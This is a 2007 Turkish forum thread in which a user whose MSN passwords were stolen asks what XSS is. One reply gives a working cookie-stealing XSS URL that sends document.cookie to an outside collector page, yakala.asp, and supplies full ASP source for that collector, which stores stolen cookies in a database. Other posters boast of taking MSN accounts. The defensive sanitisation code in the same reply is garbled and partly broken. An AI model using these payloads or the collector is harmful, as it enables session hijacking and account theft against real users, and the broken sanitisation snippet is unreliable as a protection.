Xss Açığı Nedir??

06/Eyl/07 08:53

Kısayol

Şikayet

Özel Mesaj

fatihaydemir14

Kayıt Tarihi: 22/Ağustos/2005

ya arkadaslar bu xss açığı denen şey yüzünden bütn msn adreslerimin şifrelerini buluo arkadslar ya..bu nedir bend öğreneğim bi yardımcı olurmusun ya..

Sen benim Canımsın..,Canlı kalan Tek yanımsın...

Alıntı yap

06/Eyl/07 08:58

Kısayol

Şikayet

Özel Mesaj

anubisx

Kayıt Tarihi: 21/Ağustos/2005

XSS Açıkları Request ile kullanıcıdan alınan verilerin sayfa içinde
Yazdırılması ile oluşur. Örneğin QueryString ile alınan sayfa
numaraları yada ilgili kaydı gösteren id değişkenleri.
http://www.hedefsite/Default.Asp?Page=1 yada
http://www.hedefsite/Product.Asp?id=1
http://www.hedefsite/Default.Asp?Kategori=Haber gibi.

Örnek XSS Açığı ile Ne yapılabilir :

Yukardaki örnekler gibi açığımızı buluyoruz yada hedef sitede
Webservis sayaç kodunun olması yeterli.
Açığımızı bulduktan sonra kullanıcının Cookie'sini _JavaScript
(document.cookie ) ile okuyup istediğimiz bir adresteki veri tabanına
kayıt ediyoruz yada kendimize mail atıyoruz.

-------------------------
http://www.hedefsite.com/Default.Asp?Page=2">http://www.yavşak-warrior.org/yakala.asp?X='+escape(document.cookie )
-------------------------

Saldırgan Url’nin sonuna "> Eklentisi ile Inputların sonlandırılmasını
ve bundan sonra eklenen zararlı kodları Explorer’ın icra etmesini sağlar.

Bu Link’e tıklayan kullanıcının Cookie’si Belirtilen Kaynağa Post edilir.

Yada : Hedef sitede yazdığınız mesajı gösterebilecek uygulamalar var
ise ziyaretçi defteri, forum vb. uygulama
----------------------------
http://www.yavşak-warrior.org/yakala.asp?X='
+document.cookie
----------------------------
Bu kod ilgili sayfada görüntülendiği anda sayfayı görüntüleyen
kullanıcıların cookielerini alarak yakala.asp dosyasına veri tabanına
kaydetmesi için gönderir.

Web Sayfanızda XSS açıkları kapatılmış Olsada, Webservis Sayac kodu
var ise bu sayesinde XSS Açığı Oluşuyor.
WebServis Tarafından verilen ve Sitenize eklediğiniz;

------------------------------------
wbanner=11;
href=http://www.webservis.gen">http://www.webservis.gen.tr/sayac.js">
-------------------------------------

XSS Açıklarını Engellemek için:

Request ile alınan değerleri her zaman QueryString’de olsa Replace ile
Aşağıdaki şekilde temizleyin

Ve Request verilerini alırken mutlaka tam sayıya çevirin

Recid = CInt(Trim(Server.HTMLEncode("Recid"

) )

Recid = Replace(Recid, "<" , "<"

’küçüktür
Recid = Replace(Recid, ">" , ">"

’büyüktür
Recid = Replace(Recide, "’" , "’"

’tek tırnak
Recid = Replace(Recid, Chr(10 ) , ""

’Satır Başı
Recid = Replace(Recid, Chr(34 ) , ""

’çift tırnak

---------------------------------------------------

ASP.NET ’de

web.config Dosyasında aşağıdaki değişikleri yaptığınızda " ’ "

gibi karakterleri sistem kendisi kontrol eder. Bu Sayede hemen hemen
hiçbir XSS ve SQL Enjeksiyon teknikleri Etkili olmaz

IPS Kullanıyor iseniz

Yeni imza yaratıp

Application Layer / HTTP / HTTP.URL_DECODED
Protokolüne;

’ Tek Tırnak,
" Çift Tırnak
< Küçük
> Büyük

Karakterlerini ekleyerek XSS ve SQL Enjeksiyon Saldırılarını Direkt
Engelleyebilirsiniz...

----------------------------------------------------------------------------------

Yakala.ASP’den Gelen Verileri yakalamak ve Veritabanına kaydetmek için

Örnek Basit bir ASP Dosyası

X = Request.QueryString("X"

Yerine
Veri URL’den geleceği için
X = Request.ServerVariables("HTTP_REFERER"

de Kullanabilirsiniz.

"Yakala.mdb" adında bir database oluşturun "tblYakala" adında bir
tablo ve "Sayfa" Adında (alan tipi Not ) Oalcak şekilde Tasarlayın

--------------------Yakala.Asp-----------------------------------

<%
Dim X
X = Request.QueryString("X"

%>

<%
Dim ConnString,bag
ConnString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &
server.mappath("Yakala.mdb"

& ";"
set bag = Server.CreateObject("ADODB.Connection"

bag.Open ConnString
%>

<%
Dim SQL,Rs
Set Rs=Server.CreateObject("ADODB.Recordset"

SQL="Select * From tblYakala"
Rs.Open SQL,ConnString,1,3
End iF
%>

<%
Rs.AddNew
Rs("Sayfa"

=X
Rs.Update
Rs.Close
%>

http://yigitdemirag.com

Alıntı yap

06/Eyl/07 09:27

Kısayol

Şikayet

Özel Mesaj

amele_2

Kayıt Tarihi: 01/Eylül/2005

Xss Part2

Xss"i Anlayalım

XSS Nedir?

XSS Cookie çalma ile web hack

konu açmadan evvel döküman arşivine bakman daha iyi olurdu.

Ardından yüz köpek havlamayan kurt, kurt sayılmaz..

Alıntı yap

05/Kas/07 15:27

Kısayol

Şikayet

Özel Mesaj

emuxa

Kayıt Tarihi: 14/Haziran/2006

bunun yenisi varmı bir biliginiz varmı ? acil ihtiyacım var bulan olursa yazarmısınız pls

01100101 01101101 01110101 01111000 01100001

Alıntı yap

05/Kas/07 15:37

Kısayol

Şikayet

Özel Mesaj

ZaYGo

Kayıt Tarihi: 10/Haziran/2007

hotmail dede vardı xss:D Az msn goturmedim :D

Long Live Turkey..

Alıntı yap

05/Kas/07 16:01

Kısayol

Şikayet

Özel Mesaj

rappermcs

Kayıt Tarihi: 04/Ekim/2002

anubisx bunu yazdı:
-----------------------------
-------------------------
http://www.hedefsite.com/Default.Asp?Page=2">http://www.cyber-warrior.org/yakala.asp?X='+escape(document.cookie )
-------------------------
-----------------------------

DİKKAT!!!

Şahsi görüşüm bu Postun editlenmesi gerekiyor. Mod arkadaşlara duyurulur.

Paslanmış bir uygulama geliştirici.. #AnalistŞart

Alıntı yap

05/Kas/07 16:20

Kısayol

Şikayet

Özel Mesaj

Lathedarkman

Kayıt Tarihi: 05/Mayıs/2007

xss nin ne olduğunu öğreneceğine nasıl korunurum diye sorsan olmazmıydı ? açığın ne olduğunu zahmet edip arasan bulurdun zaten dökümanlarda'da yada forumlarda bu kadar beleşçi olma

Alıntı yap

09/Kas/07 21:31

Kısayol

Şikayet

Özel Mesaj

r3dros

Kayıt Tarihi: 17/Temmuz/2005

Paşam sende tanımadığın maileri acma Sil mailine gelen linklere tıklama...

Alıntı yap

09/Kas/07 21:46

Kısayol

Şikayet

Özel Mesaj

fatihaydemir14

Kayıt Tarihi: 22/Ağustos/2005

ya abi çocuk bana mail fln yolamad..benm adreside o eklemişş çocukla konusrken bana sende xss açığı var senin şifreni şimdi değiştirecem dedi..sonra o adrese bidaha girmemdm:(

Sen benim Canımsın..,Canlı kalan Tek yanımsın...

Alıntı yap